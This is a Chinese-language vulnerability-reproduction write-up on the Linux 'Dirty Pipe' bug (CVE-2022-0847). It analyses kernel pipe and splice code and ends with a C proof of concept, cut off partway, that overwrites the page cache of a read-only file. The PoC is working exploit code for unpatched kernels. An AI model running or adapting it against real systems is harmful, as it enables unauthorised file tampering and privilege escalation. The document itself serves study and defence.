CVE-2022-0847漏洞复现

CVE-2022-0847漏洞复现

page cache

首先取自linux官方文档对于page cache的解释

物理内存是易失性的,将数据导入内存的常见情况是从文件中读取数据。每当读取文件时,数据都会放入page cache中,以避免在后续读取时进行昂贵的磁盘访问。同样,当写入文件时,数据被放置在page cache中,并最终进入后备存储设备。写入的页面被标记为脏页面,当 Linux 决定将它们重用于其他目的时,它会确保将设备上的文件内容与更新的数据同步。

pipe系列

在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
                                                         struct file
+----------------+
| |
+--------->| |
| +----------------+
| | *private_data +-----------------------------------+
| | | |
| +----------------+ |
| +----+ *f_op | |
| | | | |
| | +----------------+ |
Userland | | | *f_inode +--+ | struct pipe_inode_info
| | | | | |
+-----------------+-----------------+ | | +----------------+ | struct inode | +------------+
| fd[0] | files[0] +-----+ | | | +-->+------------+ +------->| | +-------------+
| | read | | +----------------+ | | *i_op +----+ | +------------+ +--->| pipe_buffer |
+-----------------+-----------------+ | | | | | | | | | +-------------+
| fd[1] | files[1] +-----+ | | +------------+ | | +------------+ | | pipe_buffer |
| | write | | | struct file | | ...... | | | | | | +-------------+
+-----------------+-----------------+ | | +----------------+ | | | | | +------------+ | | ........... |
+-----|--->| | | +------------+ | | | *bufs +------+ +-------------+
| | | | | i_pipe +----|----------+ +------------+ | pipe_buffer |
| +----------------+ | | | | | | +-------------+
| | *private_data | | +------------+ | +------------+
| | | | | ...... | | +------------+
| +----------------+ | | | |
+----+ *f_op | | +------------+ |
| | | | |
| +----------------+ | | +------------------------------------------------+
| | *f_inode | | | | const struct file_operations pipefifo_fops = { |
| | +--+ | | .open = fifo_open, |
| +----------------+ | | .llseek = no_llseek, |
| | | | | .read_iter = pipe_read, |
| +----------------+ +-----+------------+ .write_iter = pipe_write, |
| | | .poll = pipe_poll, |
| | | .unlocked_ioctl = pipe_ioctl, |
| | | .release = pipe_release, |
| | | .fasync = pipe_fasync, |
| | | .splice_write = iter_file_splice_write, |
+----------------------------------------+ | }; |
+------------------------------------------------+

pipe_inode_info

位于 include/linux/pipe_fs_i.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
58 struct pipe_inode_info {
59 struct mutex mutex;
60 wait_queue_head_t rd_wait, wr_wait;
61 unsigned int head; //写入pipe时所指向的bufs的下标
62 unsigned int tail; //读出pipe时所指向的bufs的下标
63 unsigned int max_usage; //bufs最多包含的pipe_buffer
64 unsigned int ring_size; //目前总共的pipe_buffer数量,默认0x10,可以通过fcntl(F_SETPIPE_SZ)进行修改,但是需为2的幂次
65 #ifdef CONFIG_WATCH_QUEUE
66 bool note_loss;
67 #endif
68 unsigned int nr_accounted;
69 unsigned int readers; //目前读者数目
70 unsigned int writers; //目前写者数目
71 unsigned int files; //映射到该pipe_inode_info的file数目
72 unsigned int r_counter;
73 unsigned int w_counter;
74 unsigned int poll_usage;
75 struct page *tmp_page;
76 struct fasync_struct *fasync_readers;
77 struct fasync_struct *fasync_writers;
78 struct pipe_buffer *bufs; //struct pipe_buffer数组
79 struct user_struct *user; //创建该pipe的用户
80 #ifdef CONFIG_WATCH_QUEUE
81 struct watch_queue *watch_queue;
82 #endif
83 };

pipefifo_fops

位于 fs/pipe.c,这里是pipe管道文件对应的虚函数表

1
2
3
4
5
6
7
8
9
10
11
1218 const struct file_operations pipefifo_fops = {
1219 .open = fifo_open,
1220 .llseek = no_llseek,
1221 .read_iter = pipe_read,
1222 .write_iter = pipe_write,
1223 .poll = pipe_poll,
1224 .unlocked_ioctl = pipe_ioctl,
1225 .release = pipe_release,
1226 .fasync = pipe_fasync,
1227 .splice_write = iter_file_splice_write,
1228 };

pipe_write

一步一步分析pipe_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
415 static ssize_t
416 pipe_write(struct kiocb *iocb, struct iov_iter *from)
417 {
418 struct file *filp = iocb->ki_filp;
419 struct pipe_inode_info *pipe = filp->private_data;
420 unsigned int head;
421 ssize_t ret = 0;
422 size_t total_len = iov_iter_count(from);
423 ssize_t chars;
424 bool was_empty = false;
425 bool wake_next_writer = false;
......
446 /*
447 * If it wasn't empty we try to merge new data into
448 * the last buffer.
449 *
450 * That naturally merges small writes, but it also
451 * page-aligns the rest of the writes for large writes
452 * spanning multiple pages.
453 */
454 head = pipe->head;
455 was_empty = pipe_empty(head, pipe->tail); //判断pipe是否现在内容为空
456 chars = total_len & (PAGE_SIZE-1); //total_len为我们想总共写入的字节数
457 if (chars && !was_empty) { //当为空就不会走这里,这里是如果本次指向的head还有空闲空间,则会用它来进行写入
458 unsigned int mask = pipe->ring_size - 1;
459 struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
460 int offset = buf->offset + buf->len; //偏移是指该pipe_buffer所指向的page页面中的偏移,这里再加上len就可以得到即将写入的位置
461
462 if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
463 offset + chars <= PAGE_SIZE) {
464 ret = pipe_buf_confirm(pipe, buf);
465 if (ret)
466 goto out;
467
468 ret = copy_page_from_iter(buf->page, offset, chars, from);
469 if (unlikely(ret < chars)) {
470 ret = -EFAULT;
471 goto out;
472 }
473
474 buf->len += ret; //这里将len+我们刚刚写入的值
475 if (!iov_iter_count(from))
476 goto out;
477 }
478 }

简述一下上面的步骤:

  1. 检查整个pipe所指向buffer的空间,这里检查我们想要传入的总字节数 total_len,然后计算 chars,也就是总字节数对 PAGE_SIZE 取余数
  2. 这里来判断offset + chars会不会超过该head buffer所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE参数,满足两个条件就进行下面buffer的复制

然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
480     for (;;) {
481 if (!pipe->readers) {
482 send_sig(SIGPIPE, current, 0);
483 if (!ret)
484 ret = -EPIPE;
485 break;
486 }
487
488 head = pipe->head;
/* 查看bufs是否已经用完,未用完则进入if的内容,否则跳过 */
489 if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
490 unsigned int mask = pipe->ring_size - 1;
491 struct pipe_buffer *buf = &pipe->bufs[head & mask]; //获取写入的bufs数组下标
492 struct page *page = pipe->tmp_page;
493 int copied;
494
495 if (!page) {
496 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); //如果pipe没有cache页面,则分配
497 if (unlikely(!page)) {
498 ret = ret ? : -ENOMEM;
499 break;
500 }
501 pipe->tmp_page = page;
502 }
503
504 /* 在 bufs ring中分配一个slot并且连接在空的pipe_buffer上
505 * If we fault or otherwise fail to use
506 * it, either the reader will consume it or it'll still
507 * be there for the next write.
508 */
509 spin_lock_irq(&pipe->rd_wait.lock);
510
511 head = pipe->head;
512 if (pipe_full(head, pipe->tail, pipe->max_usage)) {
513 spin_unlock_irq(&pipe->rd_wait.lock);
514 continue;
515 }
516
517 pipe->head = head + 1;
518 spin_unlock_irq(&pipe->rd_wait.lock);
519
520 /* Insert it into the buffer array */
521 buf = &pipe->bufs[head & mask];
522 buf->page = page;
523 buf->ops = &anon_pipe_buf_ops; //pipe_buffer的回调函数
524 buf->offset = 0;
525 buf->len = 0;
526 if (is_packetized(filp)) //查看是否设置文件的flags O_DIRECT
527 buf->flags = PIPE_BUF_FLAG_PACKET;
528 else
529 buf->flags = PIPE_BUF_FLAG_CAN_MERGE; //未设置则置该标志位
530 pipe->tmp_page = NULL;
531
532 copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
533 if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
534 if (!ret)
535 ret = -EFAULT;
536 break;
537 }
538 ret += copied;
539 buf->offset = 0;
540 buf->len = copied;
541
542 if (!iov_iter_count(from))
543 break;
544 }
545 /* 走到这里说明pipe bufs中的page页面用完了 */
546 if (!pipe_full(head, pipe->tail, pipe->max_usage))
547 continue;
548
549 /* Wait for buffer space to become available. */
550 if (filp->f_flags & O_NONBLOCK) {
551 if (!ret)
552 ret = -EAGAIN;
553 break;
554 }
555 if (signal_pending(current)) {
556 if (!ret)
557 ret = -ERESTARTSYS;
558 break;
559 }
560
561 /*
562 * We're going to release the pipe lock and wait for more
563 * space. We wake up any readers if necessary, and then
564 * after waiting we need to re-check whether the pipe
565 * become empty while we dropped the lock.
566 */
567 __pipe_unlock(pipe);
568 if (was_empty)
569 wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
570 kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
571 wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
572 __pipe_lock(pipe);
573 was_empty = pipe_empty(pipe->head, pipe->tail);
574 wake_next_writer = true;
575 }
.......

这里的for循环是整个pipe_write部分的核心,他承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们用户区传入的数据,这里如果我们创建pipe的时候没有设置标识 O_DIRECT,则会在每个新创建的pipe_buffer->flags置为 PIPE_BUF_FLAG_CAN_MERGE

pipe_read

pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info 相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE

splice系统调用

先看看手册中的描述

splice()  moves  data  between  two file descriptors without copying between kernel address space and user address space.  It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.

大致意思是该系统调用在两个文件描述符之间移动数据,而不需要在内核地址空间与用户地址空间之间进行拷贝.它至多可以从 fd_in文件描述符向 fd_out文件描述符传输 len字节的数据,值得注意的是这两个文件描述符中至少有一个必须指向管道

1
2
3
4
5
6
7
8
9
/* 这里有几条规则是传入参数需要遵守的
* 1.如果fd_in为pipe,则off_in必须要是NULL;
* 2.如果fd_in不是pipe,且off_in是NULL,读取字节将会从file offset开始,读取完毕后进行适当的设置
* 3.如果fd_in不是pipe,且off_in非空,则off_in必须指向一个buffer,该buffer中存放着从fd_in读取数据的起始偏移,这种情况下fd_in的file offset将不会改变
* 4.上述的fd_in与off_in的规则同样作用于fd_out与off_out
*/
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t len, unsigned int flags);

似乎是有九种传参组合

fd_in off_in fd_out off_out Right/Wrong
pipe NULL pipe NULL :white_check_mark:
pipe NULL file NULL :white_check_mark:
pipe NULL file buffer :white_check_mark:
file NULL pipe NULL :white_check_mark:
file NULL file NULL :x:
file NULL file buffer :x:
file buffer pipe NULL :white_check_mark:
file buffer file NULL :x:
file buffer file buffer :x:

由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况

然后我们来看系统调用源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
1332 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
1333 int, fd_out, loff_t __user *, off_out,
1334 size_t, len, unsigned int, flags)
1335 {
1336 struct fd in, out;
1337 long error;
1338
1339 if (unlikely(!len))
1340 return 0;
1341
1342 if (unlikely(flags & ~SPLICE_F_ALL))
1343 return -EINVAL;
1344
1345 error = -EBADF;
1346 in = fdget(fd_in);
1347 if (in.file) {
1348 out = fdget(fd_out);
1349 if (out.file) {
1350 error = __do_splice(in.file, off_in, out.file, off_out,
1351 len, flags);
1352 fdput(out);
1353 }
1354 fdput(in);
1355 }
1356 return error;
1357 }

基本没有什么好说的,直接看 __do_splice

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
1116 static long __do_splice(struct file *in, loff_t __user *off_in,
1117 struct file *out, loff_t __user *off_out,
1118 size_t len, unsigned int flags)
1119 {
1120 struct pipe_inode_info *ipipe;
1121 struct pipe_inode_info *opipe;
1122 loff_t offset, *__off_in = NULL, *__off_out = NULL;
1123 long ret;
1124
1125 ipipe = get_pipe_info(in, true);
1126 opipe = get_pipe_info(out, true);
1127
1128 if (ipipe && off_in)
1129 return -ESPIPE;
1130 if (opipe && off_out)
1131 return -ESPIPE;
1132 /* 由上面的规律统计可知,这里我们至多只会有一个off_*非空,所以不用担心重写入的问题 */
1133 if (off_out) {
1134 if (copy_from_user(&offset, off_out, sizeof(loff_t))) //从用户off_out拷贝数据到&offset
1135 return -EFAULT;
1136 __off_out = &offset;
1137 }
1138 if (off_in) {
1139 if (copy_from_user(&offset, off_in, sizeof(loff_t))) //从用户off_in拷贝数据到&offset
1140 return -EFAULT;
1141 __off_in = &offset;
1142 }
1143 /* 这里传入的__off_in和__off_out至多只会有一个指针非空 */
1144 ret = do_splice(in, __off_in, out, __off_out, len, flags);
1145 if (ret < 0)
1146 return ret;
1147
1148 if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
1149 return -EFAULT;
1150 if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
1151 return -EFAULT;
1152
1153 return ret;
1154 }

这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)

do_splice

然后调用 do_splice函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:

  1. in和out均为pipe
  2. in为pipe,out为普通文件
  3. in为普通文件,out为pipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
1025 /*      
1026 * Determine where to splice to/from.
1027 */
1028 long do_splice(struct file *in, loff_t *off_in, struct file *out,
1029 loff_t *off_out, size_t len, unsigned int flags)
1030 {
1031 struct pipe_inode_info *ipipe;
1032 struct pipe_inode_info *opipe;
1033 loff_t offset;
1034 long ret;
1035
1036 if (unlikely(!(in->f_mode & FMODE_READ) ||
1037 !(out->f_mode & FMODE_WRITE)))
1038 return -EBADF;
1039
1040 ipipe = get_pipe_info(in, true);
1041 opipe = get_pipe_info(out, true);
1042 /* 如果in和out都是pipe */
1043 if (ipipe && opipe) {
1044 if (off_in || off_out) //二段检查
1045 return -ESPIPE;
1046
1047 /* 如果说我们使用pipe的读写文件描述符们来调用splice可能是十分有趣的, 但是就不准就不准就不准 :) */
1048 if (ipipe == opipe)
1049 return -EINVAL;
1050
1051 if ((in->f_flags | out->f_flags) & O_NONBLOCK)
1052 flags |= SPLICE_F_NONBLOCK;
1053
1054 return splice_pipe_to_pipe(ipipe, opipe, len, flags);
1055 }
......

:one: pipe_to_pipe

可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
1434 /* 
1435 * Splice contents of ipipe to opipe.
1436 */
1437 static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
1438 struct pipe_inode_info *opipe,
1439 size_t len, unsigned int flags)
1440 {
1441 struct pipe_buffer *ibuf, *obuf;
1442 unsigned int i_head, o_head;
1443 unsigned int i_tail, o_tail;
1444 unsigned int i_mask, o_mask;
1445 int ret = 0;
1446 bool input_wakeup = false;
.......
1511 ibuf = &ipipe->bufs[i_tail & i_mask];
1512 obuf = &opipe->bufs[o_head & o_mask];
1513
1514 if (len >= ibuf->len) {
1515 /*
1516 * Simply move the whole buffer from ipipe to opipe
1517 */
1518 *obuf = *ibuf;
1519 ibuf->ops = NULL;
1520 i_tail++;
1521 ipipe->tail = i_tail;
1522 input_wakeup = true;
1523 o_len = obuf->len;
1524 o_head++;
1525 opipe->head = o_head;
1526 } else {
1527 /*
1528 * Get a reference to this pipe buffer,
1529 * so we can copy the contents over.
1530 */
1531 if (!pipe_buf_get(ipipe, ibuf)) {
1532 if (ret == 0)
1533 ret = -EFAULT;
1534 break;
1535 }
1536 *obuf = *ibuf;
......

这里我们返回到do_splice,说下一个if判断


注意这里是 do_splice剩下的部分代码,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
1057     if (ipipe) {
1058 if (off_in)
1059 return -ESPIPE;
1060 if (off_out) {
1061 if (!(out->f_mode & FMODE_PWRITE))
1062 return -EINVAL;
1063 offset = *off_out;
1064 } else {
1065 offset = out->f_pos;
1066 }
1067
1068 if (unlikely(out->f_flags & O_APPEND))
1069 return -EINVAL;
1070
1071 ret = rw_verify_area(WRITE, out, &offset, len); //查看是否越界
1072 if (unlikely(ret < 0))
1073 return ret;
1074
1075 if (in->f_flags & O_NONBLOCK)
1076 flags |= SPLICE_F_NONBLOCK;
1077
1078 file_start_write(out);
1079 ret = do_splice_from(ipipe, out, &offset, len, flags);
1080 file_end_write(out);
1081
1082 if (!off_out)
1083 out->f_pos = offset;
1084 else
1085 *off_out = offset;
1086
1087 return ret;
1088 }

:two: pipe_to_file

然后我们查看do_splice_from函数,这是第二种情况的判断

1
2
3
4
5
6
7
762 static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,                                
763 loff_t *ppos, size_t len, unsigned int flags)
764 {
765 if (unlikely(!out->f_op->splice_write))
766 return warn_unsupported(out, "write");
767 return out->f_op->splice_write(pipe, out, ppos, len, flags);
768 }

这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec数组,他的结构如下:

1
2
3
4
5
32 struct bio_vec {                                                                                           
33 struct page *bv_page;
34 unsigned int bv_len;
35 unsigned int bv_offset;
36 };

然后之后调用vfs_iter_write写入文件buffer

:three: file_to_pipe

然后是最后一部分的do_splice,也是咱们本次漏洞的重点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 if (opipe) {
1091 if (off_out)
1092 return -ESPIPE;
1093 if (off_in) {
1094 if (!(in->f_mode & FMODE_PREAD))
1095 return -EINVAL;
1096 offset = *off_in;
1097 } else {
1098 offset = in->f_pos;
1099 }
1100
1101 if (out->f_flags & O_NONBLOCK)
1102 flags |= SPLICE_F_NONBLOCK;
1103
1104 ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
1105 if (!off_in)
1106 in->f_pos = offset;
1107 else
1108 *off_in = offset;
1109
1110 return ret;
1111 }
1112
1113 return -EINVAL;
1114 }

直接查看splice_file_to_pipe 调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations,其中<name>为我们的文件系统名称,例如ext4等等

1
2
3
4
5
splice_file_to_pipe
do_splice_to
in->f_op->splice_read <==> generic_file_splice_read
call_read_iter
in->f_op->read_iter <==> generic_file_read_iter

好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释

This is the “read_iter()” routine for all filesystems that can use the page cache directly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
2773 {
2774 size_t count = iov_iter_count(iter); //返回iter->count,也就是我们复制的字节数
2775 ssize_t retval = 0;
2776
2777 if (!count)
2778 return 0; /* skip atime */
2779
2780 if (iocb->ki_flags & IOCB_DIRECT) { //看是否文件标识带有O_DIRECT,若有该标识,则绕过cache
2781 struct file *file = iocb->ki_filp;
2782 struct address_space *mapping = file->f_mapping;
2783 struct inode *inode = mapping->host;
2784
2785 if (iocb->ki_flags & IOCB_NOWAIT) {
2786 if (filemap_range_needs_writeback(mapping, iocb->ki_pos,
2787 iocb->ki_pos + count - 1))
2788 return -EAGAIN;
2789 } else {
2790 retval = filemap_write_and_wait_range(mapping,
2791 iocb->ki_pos,
2792 iocb->ki_pos + count - 1);
2793 if (retval < 0)
2794 return retval;
2795 }
2796
2797 file_accessed(file);
2798
2799 retval = mapping->a_ops->direct_IO(iocb, iter);
2800 if (retval >= 0) {
2801 iocb->ki_pos += retval;
2802 count -= retval;
2803 }
2804 if (retval != -EIOCBQUEUED)
2805 iov_iter_revert(iter, count - iov_iter_count(iter));
2806
2807 /*
2808 * Btrfs can have a short DIO read if we encounter
2809 * compressed extents, so if there was an error, or if
2810 * we've already read everything we wanted to, or if
2811 * there was a short read because we hit EOF, go ahead
2812 * and return. Otherwise fallthrough to buffered io for
2813 * the rest of the read. Buffered reads will not work for
2814 * DAX files, so don't bother trying.
2815 */
2816 if (retval < 0 || !count || IS_DAX(inode))
2817 return retval;
2818 if (iocb->ki_pos >= i_size_read(inode))
2819 return retval;
2820 }
2821
2822 return filemap_read(iocb, iter, retval);
2823 }
2824 EXPORT_SYMBOL(generic_file_read_iter);

其中涉及到两个中间变量 iocb 和 iter,他们两个是在generic_file_splice_read当中进行初始化的,下面分别给出初始化步骤:

  • iter

  • iocb

然后我们看到最后调用filemap_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
2642 ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
2643 ssize_t already_read)
2644 {
2645 struct file *filp = iocb->ki_filp; //获取in_file文件
2646 struct file_ra_state *ra = &filp->f_ra;
2647 struct address_space *mapping = filp->f_mapping; //查看文件映射部分
2648 struct inode *inode = mapping->host; //获取in_file对应的inode
2649 struct folio_batch fbatch;
2650 int i, error = 0;
2651 bool writably_mapped;
2652 loff_t isize, end_offset;
2653
...
2661
2662 do {
2663 cond_resched();
2664
2665 /*
2666 * If we've already successfully copied some data, then we
2667 * can no longer safely return -EIOCBQUEUED. Hence mark
2668 * an async read NOWAIT at that point.第一次already_read=0
2669 */
2670 if ((iocb->ki_flags & IOCB_WAITQ) && already_read)
2671 iocb->ki_flags |= IOCB_NOWAIT;
2672
2673 if (unlikely(iocb->ki_pos >= i_size_read(inode)))
2674 break;
2675
2676 error = filemap_get_pages(iocb, iter, &fbatch);
...
2727 copied = copy_folio_to_iter(folio, offset, bytes, iter);
2728
2729 already_read += copied;
2730 iocb->ki_pos += copied;
2731 ra->prev_pos = iocb->ki_pos;
2732
...
2743
2744 file_accessed(filp);
2745
2746 return already_read ? already_read : error;
2747 }
2748 EXPORT_SYMBOL_GPL(filemap_read);

在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个do-while的大循环当中,主要通过调用copy_folio_to_iter来复制chunks

这里给出folio发布的官方解释,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)

可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter实际上也仅仅是调用了copy_page_to_iter

我们来查看copy_page_to_iter函数调用链,根据文件的类型会有以下的情况

1
2
3
copy_page_to_iter
__copy_page_to_iter
copy_page_to_iter_pipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
382 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
383 struct iov_iter *i)
384 {
385 struct pipe_inode_info *pipe = i->pipe;
386 struct pipe_buffer *buf;
387 unsigned int p_tail = pipe->tail;
388 unsigned int p_mask = pipe->ring_size - 1;
389 unsigned int i_head = i->head;
390 size_t off;
391
392 if (unlikely(bytes > i->count))
393 bytes = i->count;
394
395 if (unlikely(!bytes))
396 return 0;
397
398 if (!sanity(i))
399 return 0;
400
401 off = i->iov_offset;
402 buf = &pipe->bufs[i_head & p_mask]; //获取pipe的head指向的pipe_buffer
403 if (off) {
404 if (offset == off && buf->page == page) {
405 /* merge with the last one */
406 buf->len += bytes;
407 i->iov_offset += bytes;
408 goto out;
409 }
410 i_head++;
411 buf = &pipe->bufs[i_head & p_mask];
412 }
413 if (pipe_full(i_head, p_tail, pipe->max_usage))
414 return 0;
415
416 buf->ops = &page_cache_pipe_buf_ops;
417 // buf->flags = 0; 这里需要我们手动将该行注释掉,然后再编译内核
418 get_page(page);
419 buf->page = page;
420 buf->offset = offset;
421 buf->len = bytes;
422
423 pipe->head = i_head + 1;
424 i->iov_offset = offset + bytes;
425 i->head = i_head;
426 out:
427 i->count -= bytes;
428 return bytes;
429 }

我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本

漏洞利用

我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buffer中时并没有修改其中的标识位,也就是pipe_buffer->flags,
此时如果flags中存在PIPE_BUF_FLAG_CAN_MERGE,那么我们下次在写入该buffer的时候将从该pipe_buffer的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer是指向pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑该文件是否可写.

所以本次漏洞利用分为以下几个步骤:

  1. 分配pipe以及其中的buffer
  2. 首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE标识
  3. splice系统调用,将不可写的文件数据内容“拷贝”到pipe当中
  4. 我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写

下面是漏洞的poc以及演示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PAGE_SIZE 0x1000

void initial_pipe(int *my_pipe);
void fill_pipe(int *my_pipe);
void drain_pipe(int *my_pipe);
void free_env(int *my_pipe);

/*
 * Debugging aid: prints a coloured marker on stdout and then blocks until
 * a character can be read from stdin, so a debugger can be attached.
 */
void debug()
{
    fputs("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n", stdout);
    (void)getchar();
}

/*
 * PoC entry point.
 *
 * Usage: <our_poc> <vuln_file> <offset> <payload>
 *
 *   vuln_file  file opened read-only whose page cache is targeted
 *   offset     decimal byte offset handed to splice(); a negative value
 *              falls back to the file size reported by fstat()
 *   payload    NUL-terminated string written into the pipe after the splice
 *
 * Steps: create the pipe, fill it and drain it again (so every pipe_buffer
 * keeps PIPE_BUF_FLAG_CAN_MERGE), splice one byte of the file at `offset`
 * into the pipe, then write the payload into the pipe. On a vulnerable
 * kernel that write is merged into the spliced page-cache page, i.e. it
 * lands directly after the spliced byte.
 *
 * Returns 0 on success; exits with status 1 on any failure.
 */
int main(int argc, char **argv)
{
    int my_pipe[2] = {0};
    int fd_read = 0;
    struct stat file_st;
    loff_t offset = 0;      /* type expected by splice() for off_in */
    long long requested = 0;
    char *end = NULL;
    ssize_t spliced = 0;
    size_t payload_len = 0;

    if (argc < 4) {
        printf("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n");
        puts("[?]offset < 0 will use the file size as the offset...");
        exit(1);
    }

    /* Parse the offset strictly; atoi() cannot report malformed input. */
    errno = 0;
    requested = strtoll(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "invalid offset: %s\n", argv[2]);
        exit(1);
    }

    puts("[+]Initial the pipe...");
    initial_pipe(my_pipe);

    puts("[+]Fill the pipe...");
    fill_pipe(my_pipe);

    puts("[+]drain the pipe...");
    drain_pipe(my_pipe);

    fd_read = open(argv[1], O_RDONLY);
    if (fd_read < 0) {
        perror("open vuln file failed!");
        exit(1);
    }
    if (fstat(fd_read, &file_st) < 0) {
        perror("stat file failed!");
        exit(1);
    }

    /* Compare the parsed number, not the argv pointer. */
    if (requested >= 0)
        offset = (loff_t)requested;
    else
        offset = (loff_t)file_st.st_size;
    printf("%lld\n", (long long)offset);

    spliced = splice(fd_read, &offset, my_pipe[1], NULL, 1, 0);
    if (spliced < 0) {
        perror("splice fd to pipe");
        exit(1);
    }
    if (spliced == 0) {
        /*
         * Nothing was spliced (offset at or past end of file), so the pipe
         * holds no reference to the file's page and the write below could
         * not reach it.
         */
        fprintf(stderr, "splice fd to pipe: no data at the given offset\n");
        exit(1);
    }
    puts("[+]We successfully execute the splice...");

    /* Length of the payload string, not the size of the pointer. */
    payload_len = strlen(argv[3]);
    if (write(my_pipe[1], argv[3], payload_len) < 0) {
        perror("write failed");
        exit(1);
    }

